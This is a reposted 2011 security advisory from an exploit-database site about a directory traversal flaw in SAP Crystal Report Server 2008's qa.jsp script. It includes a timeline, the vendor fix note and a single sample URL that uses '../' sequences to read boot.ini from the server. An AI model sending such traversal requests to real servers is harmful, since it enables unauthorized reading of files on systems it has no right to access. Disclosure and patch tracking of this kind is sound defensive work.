[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SAP Crystal Report Server 2008 Directory Traversal

Author
Dmitriy Chastuhin
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15332
Category
web applications
Date add
27-01-2011
Platform
jsp
Application:                    SAP Crystal Report Server 2008
Versions Affected:               SAP Crystal Report Server 2008
Vendor URL:                     http://sap.com
Bugs:                           Directory Traversal File Read
Exploits:                        YES
Reported:                       29.03.2010
Vendor response:                30.03.2010
Date of SAPNOTE Published:    8.10.2010
Date of Public Advisory:        14.01.2011
Authors:                        Dmitriy Chastuhin
                        Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
 
Description
********
SAP Crystal Report Server 2008 contains a variety of features with which users can manage and share interactive reports and dashboards, as well as provide access to them via the Internet.
 
Details
*******
Directory Traversal vulnerability was found in script qa.jsp
With this vulnerability, an authenticated attacker can read any file on the server.
 
Sample
******
http://sap_server_adr:8080/PerformanceManagement/jsp/qa.jsp?func=browse&root=wi&path=../../../../../../boot.ini
 
References
**********
 
http://dsecrg.com/pages/vul/show.php?id=303
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1476930
 
 
 
 
Fix Information
*************
 
Solution to this issue is given in the 1476930 security note.



#  0day.today [2024-10-06]  #